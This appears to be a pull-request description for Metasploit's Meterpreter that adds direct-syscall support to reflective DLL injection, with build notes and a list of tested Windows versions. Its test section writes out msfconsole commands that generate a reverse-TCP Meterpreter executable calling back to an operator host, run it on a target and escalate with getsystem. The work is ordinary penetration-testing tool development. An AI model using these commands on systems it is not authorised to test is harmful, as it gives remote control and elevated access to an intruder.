- 🟢 Windows 7-8 x64
msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C sysinfo
- 🟢 Windows 11
- 🟢 Windows Kernel 10 Servers
- 🟢 Windows 2003/2008 Server
- 🟢 Windows XP SP3 x86
Includes changes from: * rapid7/metasploit-payloads#694
This PR adds the necessary changes to support the direct syscalls version of ReflectiveDLLInjection. This is a new implementation based on this first PR. At this time, the related PR in the ReflectiveDLLInjection repository is still under review, but it is possible to test by updating the ReflectiveDLLInjection submodule reference:

Don't forget to `git fetch`/`git checkout` again if the ReflectiveDLLInjection branch is updated.

Follow the standard documentation to build Meterpreter on Windows and with MinGW.

Testing with MSF

Once the DLLs are built, you need to copy the `output/` directory content into the Metasploit Framework's `data/meterpreter/` directory. Then, in the MSF console, test Meterpreter payloads (staged and single).

For example:

use windows/x64/meterpreter_reverse_tcp
set LHOST <your host IP>
generate -f exe -o direct_syscalls_payload.exe
to_handler

Copy `direct_syscalls_payload.exe` to the target and execute it; you should get a session. The console confirms that the locally built DLLs are the ones being served:

WARNING: Local file .../data/meterpreter/ext_server_stdapi.x64.dll is being used

Run `getsystem`, etc. without issues.